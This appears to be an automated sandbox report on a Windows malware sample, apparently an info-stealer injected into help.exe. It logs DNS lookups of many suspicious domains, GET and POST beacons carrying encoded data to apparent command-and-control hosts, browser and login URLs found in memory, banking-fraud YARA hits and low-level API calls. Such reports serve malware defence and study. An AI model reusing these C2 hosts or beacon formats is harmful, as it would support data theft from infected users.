Source: global traffic | HTTP traffic detected: GET /yas3/?-pKpW8DH=ACLzix20cds7up7/46wlnsk6Nsv7Q3fKxrYR6p4MvFRMrxvnqM2s8zT2fyP6MdeU99jzpRbWnk1TsskmEkSk+klaL10/tPDTZw0TZxu7M66aW95YiWhTdAsyQYGNea7whl19YBdcnHDA&h4NHh=CjqdRB50 HTTP/1.1 | Host: www.urbagan.net | Accept: */* | Accept-Language: en-US,en;q=0.5 | Connection: close | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50
Source: global traffic | DNS traffic detected: DNS query: www.paoginbcn.net
Source: global traffic | DNS traffic detected: DNS query: www.quantumxr.xyz
Source: global traffic | DNS traffic detected: DNS query: www.9c555697-d77.cfd
Source: global traffic | DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic | DNS traffic detected: DNS query: www.lingkungan.xyz
Source: global traffic | DNS traffic detected: DNS query: www.nexstep.live
Source: global traffic | DNS traffic detected: DNS query: www.031235045.xyz
Source: global traffic | DNS traffic detected: DNS query: www.truay.site
Source: global traffic | DNS traffic detected: DNS query: www.playav.mobi
Source: global traffic | DNS traffic detected: DNS query: www.warc.tech
Source: global traffic | DNS traffic detected: DNS query: www.448828.party
Source: global traffic | DNS traffic detected: DNS query: www.dresses-executive.sbs
Source: global traffic | DNS traffic detected: DNS query: www.bigjoy.xyz
Source: global traffic | DNS traffic detected: DNS query: www.klass.team
Source: global traffic | DNS traffic detected: DNS query: www.calimade.net
Source: global traffic | DNS traffic detected: DNS query: www.urbagan.net
Source: unknown | HTTP traffic detected: POST /bd6u/ HTTP/1.1 | Host: www.quantumxr.xyz | Accept: */* | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate, br | Origin: http://www.quantumxr.xyz | Referer: http://www.quantumxr.xyz/bd6u/ | Cache-Control: max-age=0 | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 221 | User-Agent: Opera/9.80 (Linux armv7l; InettvBrowser/2.2 (00014A;SonyDTV140;0001;0001) KDL40W705C; CC/SWE) Presto/2.12.407 Version/12.50 | Data Ascii: -pKpW8DH=P4VdaXijhKUOceUMXp7D7Cpn4+xeQq/4CxWQXuteL3kfufq9nQFdJ0v2H1eBoGKQhORjjNWXNmz8gpjHrE0Q9XHKbY0v0ugNm+CfBzwN+AyJ3Y3TTBWN7g2NKV8rtCovXv69ssiLPI6rcmjE9+sNP5+dFZsAriuYiGKVfKlWuNvszqvySKToleKkXn3uQGw36OKvWqhFvUEMaQzQqA==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:02 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:04 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 17 Mar 2025 07:49:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=us-ascii
                Server: Microsoft-HTTPAPI/2.0
                Date: Mon, 17 Mar 2025 07:49:09 GMT
                Connection: close
                Content-Length: 315
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Mar 2025 07:49:43 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Mar 2025 07:49:45 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Mar 2025 07:49:48 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 17 Mar 2025 07:49:50 GMT
                Content-Type: text/html
                Content-Length: 2814
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: "afe-6014d9a456b59"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:49:56 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:49:59 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:01 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:04 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:09 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:12 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:14 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:17 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:23 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:25 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 17 Mar 2025 07:50:28 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 07:50:30 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:35 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 17 Mar 2025 07:51:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Ascii: 114<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.klass.team Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 07:52:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"67d29e5f-582"X-Edge-Location: Mono
                Source: svchost.exe, 0000000A.00000002.2838530968.000002278C60E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: help.exe, 00000006.00000002.3291321296.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp, help.exe, 00000006.00000002.3293131049.0000000005BB0000.00000004.00000800.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=NDhTOHRSMTRTeVQwa2J4UzhBeThLMjdPNjNVWVliYW9UTlhYeHowT
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.847115595.000000000260B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3292767539.0000000004B02000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3292767539.0000000004B02000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.urbagan.net/yas3/
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000004060000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                Source: svchost.exe, 0000000A.00000003.1203437227.000002278C550000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: help.exe, 00000006.00000002.3289014379.000000000067C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: help.exe, 00000006.00000002.3289014379.00000000006AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: help.exe, 00000006.00000002.3289014379.000000000067C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: help.exe, 00000006.00000003.1176152816.000000000767B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: qmgr.db.10.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: help.exe, 00000006.00000002.3291321296.000000000492A000.00000004.10000000.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290990299.0000000003BAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: help.exe, 00000006.00000002.3293275447.0000000007688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

                E-Banking Fraud

                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3292767539.0000000004AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.998384257.0000000002690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3290872788.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0042C623 NtClose,3_2_0042C623
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2B60 NtClose,LdrInitializeThunk,3_2_019B2B60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_019B2DF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019B2C70
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B35C0 NtCreateMutant,LdrInitializeThunk,3_2_019B35C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B4340 NtSetContextThread,3_2_019B4340
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B4650 NtSuspendThread,3_2_019B4650
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2B80 NtQueryInformationFile,3_2_019B2B80
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BA0 NtEnumerateValueKey,3_2_019B2BA0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BF0 NtAllocateVirtualMemory,3_2_019B2BF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2BE0 NtQueryValueKey,3_2_019B2BE0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AB0 NtWaitForSingleObject,3_2_019B2AB0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AD0 NtReadFile,3_2_019B2AD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2AF0 NtWriteFile,3_2_019B2AF0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B2DB0 NtEnumerateKey,3_2_019B2DB0
